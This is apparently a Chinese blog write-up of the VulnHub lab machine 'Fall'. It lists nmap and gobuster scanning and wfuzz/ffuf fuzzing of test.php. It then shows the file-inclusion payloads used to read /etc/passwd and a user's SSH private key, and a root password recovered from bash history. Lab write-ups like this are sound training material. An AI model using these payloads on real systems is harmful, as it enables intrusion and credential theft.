vulnhub之FALL

本文围绕vulnhub之fall展开,介绍其下载地址与难度。通过主机发现确定目标IP,全端口扫描发现80端口开放网络服务,采用fuzz探测test.php所需参数。因目标ssh开放,尝试获取用户名和密码,利用文件包含查看文件,最终用qiu用户id_rsa文件登录并切换到root用户。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

vulnhub之fall
下载地址
难度:so easy
主机发现

netdiscover
nmap -sP 192.168.2.0/24

发现目的ip为192.168.2.5
进行全端口扫描

nmap -p- -T4 -A 192.168.2.5

在这里插入图片描述发现80端口开放网路服务,
使用gobuster进行目录扫描

gobuster dir -u http://192.168.2.5 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt

在这里插入图片描述发现存在test.php,访问发现,页面提示需要参数,
在这里插入图片描述这里采用fuzz探测所需参数,这里介绍两种方法,第一种是burpsuite设置参数进行暴力破解,第二种是采用wfuzz或者ffuf等工具进行实现,这里提供下简单的命令,详细使用方法会在下一篇进行描述
字典文件自行获取

wfuzz
wfuzz -u 192.168.2.5/test.php?FUZZ=/etc/passwd  -w user.txt --hh 80
ffuf
ffuf -c -w user.txt -u 'http://192.168.2.5/test.php?FUZZ=/etc/passwd' -fs 80

获取到参数为file

在这里插入图片描述因为目标的ssh开放,这里尝试获取目标的用户名以及密码,使用文件包含查看目标的/etc/passwd文件
在这里插入图片描述这里解释一下,由于/etc/passwd数据的划分,
在这里插入图片描述由于qiu用户的命令解释器为/bin/bash,根据划分,qiu属于正常用户,所以采用该用户名进行利用
ssh登录的话可以采取两种方式,第一种为账号密码,第二种为id_rsa即公钥私钥文件进行登录,这里获取qiu用户的id_rsa文件进行登录,使用文件包含获取文件,
在这里插入图片描述保存为文件,这里命名为sskey,值得注意的是,需要全部复制,从——开始到——结束,然后使用命令ssh -i sskey qiu@192.168.2.5 进行登录
在这里插入图片描述cat .bash_history 这里查看历史命令发现

在这里插入图片描述echo "remarkablyawesomE" | sudo -S dnf update
该命令为输入root用户密码,进行系统更新,所以这里的remarkablyawesomE为root密码,所以
qiu用户sudo su切换root用户即可

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值